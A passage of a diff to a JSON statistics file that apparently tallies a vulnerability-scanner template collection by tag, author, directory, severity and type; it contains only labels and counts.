@@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"avtech","count":1},{"name":"labtech","count":1},{"name":"discord","count":1},{"name":"anchorcms","count":1},{"name":"mailchimp","count":1},{"name":"kafdrop","count":1},{"name":"livezilla","count":1},{"name":"darkstat","count":1},{"name":"codemeter","count":1},{"name":"hortonworks","count":1},{"name":"crm","count":1},{"name":"opensmtpd","count":1},{"name":"sitecore","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"db","count":1},{"name":"servicedesk","count":1},{"name":"wamp","count":1},{"name":"alibaba","count":1},{"name":"fortinet","count":1},{"name":"blackboard","count":1},{"name":"redis","count":1},{"name":"tongda","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"circontrol","count":1},{"name":"checkpoint","count":1},{"name":"harbor","count":1},{"name":"dvwa","count":1},{"name":"zmanda","count":1},{"name":"st","count":1},{"name":"csod","count":1},{"name":"duomicms","count":1},{"name":"rdp","count":1},{"name":"comodo","count":1},{"name":"episerver","count":1},{"name":"opentsdb","count":1},{"name":"servicenow","count":1},{"name":"igs","count":1},{"name":"setup","count":1},{"name":"kong","count":1},{"name":"eyou","count":1},{"name":"wuzhicms","count":1},{"name":"trilithic","count":1},{"name":"geutebruck","count":1},{"name":"blind","count":1},{"name":"targa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"kerbynet","count":1},{"name":"upnp","count":1},{"name":"b2evolution","count":1},{"name":"zarafa","count":1},{"name":"netis","count":1},{"name":"mobileiron","count":1},{"name":"keenetic","count":1},{"name":"moin","count":1},{"name":"phpunit","count":1},{"name":"htmli","count":1},{"name":"wildfly","count":1},{"name":"heroku","count":1},{"name":"wiki","count":1},{"name":"cloudinary","count":1},{"name":"tenda","count":1},{"name":"thinkadmin","count":1},{"name":"webui","count":1},{"name":"jsf","count":1},{"name":"gridx","count":1},{"name":"zend","count":1},{"name":"akamai","count":1},{"name":"gitlist","count":1},{"name":"nuuo","count":1},{"name":"doh","count":1},{"name":"74cms","count":1},{"name":"proftpd","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"tensorflow","count":1},{"name":"jitsi","count":1},{"name":"plone","count":1},{"name":"bash","count":1},{"name":"zenario","count":1},{"name":"monitorix","count":1},{"name":"ecom","count":1},{"name":"yii","count":1},{"name":"webmin","count":1},{"name":"webadmin","count":1},{"name":"ueditor","count":1},{"name":"lancom","count":1},{"name":"lanproxy","count":1},{"name":"concrete","count":1},{"name":"ilo4","count":1},{"name":"goahead","count":1},{"name":"opensns","count":1},{"name":"grav","count":1},{"name":"bolt","count":1},{"name":"netsweeper","count":1},{"name":"totaljs","count":1},{"name":"feifeicms","count":1},{"name":"flink","count":1},{"name":"finereport","count":1},{"name":"rujjie","count":1},{"name":"webmodule-ee","count":1},{"name":"fortilogger","count":1},{"name":"spring","count":1},{"name":"lansweeper","count":1},{"name":"flash","count":1},{"name":"weiphp","count":1},{"name":"vscode","count":1},{"name":"varnish","count":1},{"name":"npm","count":1},{"name":"emc","count":1},{"name":"drone","count":1},{"name":"alertmanager","count":1},{"name":"gateone","count":1},{"name":"mara","count":1},{"name":"shopxo","count":1},{"name":"jenkin","count":1},{"name":"subrion","count":1},{"name":"rmi","count":1},{"name":"powercreator","count":1},{"name":"postmessage","count":1},{"name":"liferay","count":1},{"name":"backdoor","count":1},{"name":"panos","count":1},{"name":"zte","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"nadino","count":8},{"name":"hackergautam","count":8},{"name":"aashiq","count":8},{"name":"wdahlenb","count":8},{"name":"iamthefrogy","count":8},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"that_juan_","count":7},{"name":"r3dg33k","count":7},{"name":"dr_set","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"pentest_swissky","count":5},{"name":"caspergn","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"meme-lord","count":4},{"name":"iamnoooob","count":4},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"0xsapra","count":2},{"name":"joeldeleep","count":2},{"name":"shifacyclewala","count":2},{"name":"gevakun","count":2},{"name":"0xprial","count":2},{"name":"mavericknerd","count":2},{"name":"foulenzer","count":2},{"name":"elsfa7110","count":2},{"name":"ehsahil","count":2},{"name":"moritz nentwig","count":2},{"name":"jarijaas","count":2},{"name":"lu4nx","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"unstabl3","count":2},{"name":"ree4pwn","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"lotusdll","count":2},{"name":"bp0lr","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"x1m_martijn","count":2},{"name":"hetroublemakr","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"daviey","count":1},{"name":"_generic_human_","count":1},{"name":"0ut0fb4nd","count":1},{"name":"nkxxkn","count":1},{"name":"j33n1k4","count":1},{"name":"tim_koopmans","count":1},{"name":"naglinagli","count":1},{"name":"koti2","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"notsoevilweasel","count":1},{"name":"pdp","count":1},{"name":"geraldino2","count":1},{"name":"shelld3v","count":1},{"name":"deena","count":1},{"name":"regala_","count":1},{"name":"bjhulst","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alifathi-h1","count":1},{"name":"dogasantos","count":1},{"name":"pudsec","count":1},{"name":"shreyapohekar","count":1},{"name":"zhenwarx","count":1},{"name":"smaranchand","count":1},{"name":"elmahdi","count":1},{"name":"kabirsuda","count":1},{"name":"luskabol","count":1},{"name":"akshansh","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"ilovebinbash","count":1},{"name":"0xtavian","count":1},{"name":"raesene","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"defr0ggy","count":1},{"name":"ohlinge","count":1},{"name":"juicypotato1","count":1},{"name":"flag007","count":1},{"name":"furkansenan","count":1},{"name":"rtcms","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"kareemse1im","count":1},{"name":"52971","count":1},{"name":"yavolo","count":1},{"name":"johnk3r","count":1},{"name":"schniggie","count":1},{"name":"shifacyclewla","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"mhdsamx","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"absshax","count":1},{"name":"sickwell","count":1},{"name":"fabaff","count":1},{"name":"nytr0gen","count":1},{"name":"ooooooo_q","count":1},{"name":"alph4byt3","count":1},{"name":"gboddin","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"exploitation","count":1},{"name":"dudez","count":1},{"name":"iampritam","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"bad5ect0r","count":1},{"name":"johnjhacking","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"sy3omda","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"vsh00t","count":1},{"name":"noamrathaus","count":1},{"name":"berkdusunur","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"_c0wb0y_","count":1},{"name":"fopina","count":1},{"name":"wabafet","count":1},{"name":"mohammedsaneem","count":1},{"name":"qlkwej","count":1},{"name":"ldionmarcil","count":1},{"name":"hanlaomo","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"willd96","count":1},{"name":"apt-mirror","count":1},{"name":"omarkurt","count":1},{"name":"thezakman","count":1},{"name":"d0rkerdevil","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"ipanda","count":1},{"name":"dawid czarnecki","count":1},{"name":"ajaysenr","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"blckraven","count":1},{"name":"kurohost","count":1},{"name":"c3l3si4n","count":1},{"name":"mubassirpatel","count":1},{"name":"toufik airane","count":1},{"name":"whynotke","count":1},{"name":"abison_binoy","count":1},{"name":"bing0o","count":1},{"name":"bolli95","count":1},{"name":"undefl0w","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"taielab","count":1},{"name":"affix","count":1},{"name":"idealphase","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"gal nagli","count":1},{"name":"luci","count":1},{"name":"ahmed sherif","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"0xrod","count":1},{"name":"co0nan","count":1},{"name":"hakluke","count":1},{"name":"patralos","count":1},{"name":"chron0x","count":1},{"name":"r3naissance","count":1},{"name":"w4cky_","count":1},{"name":"akash.c","count":1},{"name":"b4uh0lz","count":1},{"name":"arcc","count":1},{"name":"sullo","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"logs","count":24},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"sap","count":14},{"name":"cve2016","count":14},{"name":"misconfig","count":13},{"name":"cve2015","count":13},{"name":"struts","count":13},{"name":"debug","count":13},{"name":"fuzz","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"auth-bypass","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":10},{"name":"devops","count":10},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"php","count":8},{"name":"aws","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"cve2013","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"scada","count":7},{"name":"nginx","count":6},{"name":"rconfig","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"google","count":6},{"name":"citrix","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"rails","count":6},{"name":"jetty","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"laravel","count":5},{"name":"circarlife","count":5},{"name":"ruijie","count":5},{"name":"moodle","count":4},{"name":"thinkcmf","count":4},{"name":"hongdian","count":4},{"name":"thinkphp","count":4},{"name":"jolokia","count":4},{"name":"magmi","count":4},{"name":"docker","count":4},{"name":"django","count":4},{"name":"router","count":4},{"name":"ibm","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"cve2009","count":4},{"name":"traversal","count":4},{"name":"netgear","count":4},{"name":"webserver","count":4},{"name":"nodejs","count":4},{"name":"asp","count":4},{"name":"solarwinds","count":4},{"name":"vpn","count":4},{"name":"artifactory","count":4},{"name":"tomcat","count":4},{"name":"fileupload","count":4},{"name":"terramaster","count":3},{"name":"springcloud","count":3},{"name":"grafana","count":3},{"name":"ofbiz","count":3},{"name":"nosqli","count":3},{"name":"windows","count":3},{"name":"fpd","count":3},{"name":"git","count":3},{"name":"openssh","count":3},{"name":"dedecms","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"lfr","count":3},{"name":"log","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"deserialization","count":3},{"name":"kubernetes","count":3},{"name":"resin","count":3},{"name":"slack","count":3},{"name":"vbulletin","count":3},{"name":"oa","count":3},{"name":"microstrategy","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"crlf","count":3},{"name":"caucho","count":3},{"name":"printer","count":3},{"name":"bypass","count":3},{"name":"backups","count":3},{"name":"cache","count":2},{"name":"jboss","count":2},{"name":"frp","count":2},{"name":"spark","count":2},{"name":"icewarp","count":2},{"name":"rockethchat","count":2},{"name":"couchdb","count":2},{"name":"hjtcloud","count":2},{"name":"plesk","count":2},{"name":"openfire","count":2},{"name":"maian","count":2},{"name":"microsoft","count":2},{"name":"mida","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"intrusive","count":2},{"name":"keycloak","count":2},{"name":"kentico","count":2},{"name":"nexus","count":2},{"name":"zabbix","count":2},{"name":"openam","count":2},{"name":"fortios","count":2},{"name":"oauth","count":2},{"name":"sonarqube","count":2},{"name":"natshell","count":2},{"name":"kibana","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"hashicorp","count":2},{"name":"splunk","count":2},{"name":"leak","count":2},{"name":"smtp","count":2},{"name":"showdoc","count":2},{"name":"seeyon","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"nextjs","count":2},{"name":"dos","count":2},{"name":"bitrix","count":2},{"name":"telerik","count":2},{"name":"ucmdb","count":2},{"name":"pega","count":2},{"name":"smb","count":2},{"name":"flir","count":2},{"name":"paloalto","count":2},{"name":"nagios","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"idrac","count":2},{"name":"webcam","count":2},{"name":"zhiyuan","count":2},{"name":"saltstack","count":2},{"name":"bigip","count":2},{"name":"vrealize","count":2},{"name":"odoo","count":2},{"name":"service","count":2},{"name":"exposures","count":2},{"name":"proxy","count":2},{"name":"waf","count":2},{"name":"wordfence","count":2},{"name":"yapi","count":2},{"name":